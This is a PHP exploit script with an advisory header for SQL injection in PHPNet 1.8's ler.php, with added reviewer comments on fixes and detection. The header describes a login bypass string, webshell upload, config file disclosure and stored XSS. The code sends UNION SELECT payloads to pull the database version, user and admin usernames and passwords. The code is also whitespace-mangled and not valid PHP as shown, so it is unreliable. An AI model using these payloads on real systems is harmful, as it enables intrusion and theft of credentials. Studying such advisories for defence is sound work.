<? Php
Title: PHPNet <= 1.8 (ler.php) SQL Injection
Author: WhiteCollarGroup
Developer: http://www.phpnet.com.br/
: Http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos
Affected Versions: 1.8
Test Platform: Debian GNU/Linux, Windows 7 Ultimate
/*
We found multiple SQL injections in this system.
~> SQL Injection
This exploit is for the vulnerability in ler.php, but the same vulnerability exists in imprimir.php and imagem.php.
ler.php?id=[SQLi]
imprimir.php?id=[SQLi]
imagem.php?id=[SQLi]
Example
php file.php http://www.2cto.com/path/
~> Login bypass
On the login page, the login can be bypassed using SQL injection strings.
Go to http: // www.2cto.com/path/admin/login. php
Login: 'or 1 = 1 -- wc
Pass: wcgroup
~> Arbitrary File Upload
After opening the administration panel, try to add a new article.
Use the upload form to upload your webshell.
After posting, access:
Http: // server/path/tmp/your_shell_filename.php
~> Information Leakage
Access:
Http: // server/path/conf/config. ini
~> XSS Stored (persistent)
When posting a new article, (D)HTML/JavaScript code can be posted and is rendered on the page.
*/
/**
 * Prints $str followed by a newline.
 *
 * NOTE(review): this copy is whitespace-mangled ("_ printf", "$ str",
 * "\ n") and is not valid PHP as shown; the comments describe the
 * evident intent of the code only.
 */
Function _ printf ($ str ){
Echo $ str. "\ n ";
}
/**
 * Hex-encodes a string as a 0x-prefixed literal: each byte is passed
 * through ord()/dechex() and the resulting digits are concatenated.
 *
 * strlen() counts bytes, so the loop walks bytes, not multibyte
 * characters. Used below to encode the uniqid() response marker.
 */
Function hex ($ string ){
$ Hex = ''; // accumulator for the hex digits
For ($ I = 0; $ I <strlen ($ string); $ I ++ ){
$ Hex. = dechex (ord ($ string [$ I]);
}
Return '0x '. $ hex;
}
/*
 * Main script: command-line proof of concept for the unparameterised
 * `id` argument of ler.php described in the advisory above. It requests
 * ler.php?id=... with UNION SELECT payloads and reads the injected
 * columns back out of the HTML using a uniqid() marker, first for
 * version()/user() and then row by row from the pna_admin table.
 *
 * Defender notes:
 *  - The root cause is string-built SQL. The application-side fix is to
 *    validate/cast `id` as an integer and use prepared statements with
 *    bound parameters for every query, including the login query the
 *    advisory mentions.
 *  - Requests to ler.php/imprimir.php/imagem.php whose `id` value is
 *    non-numeric (here `-0'` followed by `union all select ... concat(0x...`)
 *    are a reliable detection signature in web server logs.
 *  - admin_user/admin_pass are read straight out of pna_admin; if
 *    admin_pass is not stored as a password_hash() digest, a single
 *    injection discloses usable credentials.
 */
Set_time_limit (0 ); // no execution time limit for the request loop below
Error_reporting (E_ERROR & E_USER_WARNING ); // NOTE(review): E_ERROR & E_USER_WARNING is 0 (the bit masks do not overlap), so this silences all error reporting; `|` was probably intended
@ Ini_set ('default _ socket_timeout ', 30 ); // `@` hides any ini_set() warning; checking the return value would be preferable
Echo "\ n ";
Echo "PHPNet <= 1.8 SQLi Exploit \ n ";
Echo "Discovered by WhiteCollarGroup \ n ";
Echo "www.wcgroup.host56.com-whitecollar_group@hotmail.com ";
// Exactly one argument (the target base URL) is required.
If ($ argc! = 2 ){
_ Printf ("Usage :");
_ Printf ("php $ argv [0] <target> ");
_ Printf ("Example :");
_ Printf ("php $ argv [0] http: // www.2cto.com/path /");
Exit;
}
$ Target = $ argv [1];
If (substr ($ target, (strlen ($ target)-1 ))! = "/") {// if the last character is not a slash, append one
$ Target. = "/";
}
// Base of the vulnerable request: ler.php?id=-0' followed by a space.
$ Inject = $ target. "ler. php? Id =-0 '% 20 ";
// Unique marker wrapped around each injected column so it can be
// located in the response; encoded with hex() above.
$ Token = uniqid ();
$ Token_hex = hex ($ token );
// Now fetch the following data: user(), version()
Echo "\ n [*] Trying to get informations... \ n ";
$ Infos = file_get_contents ($ inject. urlencode ("union all select 1, 2, 3, 4, concat (". $ token_hex. ", version (),". $ token_hex. ", user (),". $ token_hex. "), 6, 7, 8 --"));
$ Infos_r = array ();
// Capture groups: [1] is version(), [2] is user() (the payload orders
// them version() then user()); the variable names below are swapped.
Preg_match_all ("/$ token (. *) $ token (. *) $ token/", $ infos, $ infos_r );
$ User = $ infos_r [1] [0];
$ Version = $ infos_r [2] [0];
If ($ user) AND ($ version ))
{
Echo "[!] MySQL user: $ user \ n ";
Echo "[!] MySQL version: $ version \ n ";
}
Else
{
Echo "[-] Error while getting informations... \ n ";
}
// Walk pna_admin one row at a time (LIMIT $i,1) until a response
// contains no marker-wrapped pair.
$ I = 0;
While (1 = 1 ){ // NOTE(review): `1 = 1` here and `$ I = 0` below read as assignments in this mangled copy; `==` was evidently intended
$ Dados_r = array ();
$ Dados = file_get_contents ($ inject. urlencode ("union all select 1, 2, 3, 4, concat (". $ token_hex. ", admin_user ,". $ token_hex. ", admin_pass ,". $ token_hex. "), 6, 7, 8 from pna_admin limit $ I, 1 --"));
Preg_match_all ("/$ token (. *) $ token (. *) $ token/", $ dados, $ dados_r );
$ Login = $ dados_r [1] [0];
$ Senha = $ dados_r [2] [0];
If ($ login) AND ($ senha )){
Echo "-+-\ n ";
Echo "[!] User: $ login \ n ";
Echo "[!] Pass: $ senha \ n ";
$ I ++;
} Else {
Break; // exit loop
}
// NOTE(review): this summary sits inside the while loop, so it runs after
// every successful row rather than once afterwards, and the Break above
// skips it entirely when no row is found.
If ($ I = 0 ){
Echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry .";
} Else {
Echo "-+-\ n [!] : D ";
}
Echo "\ n ";
}
?>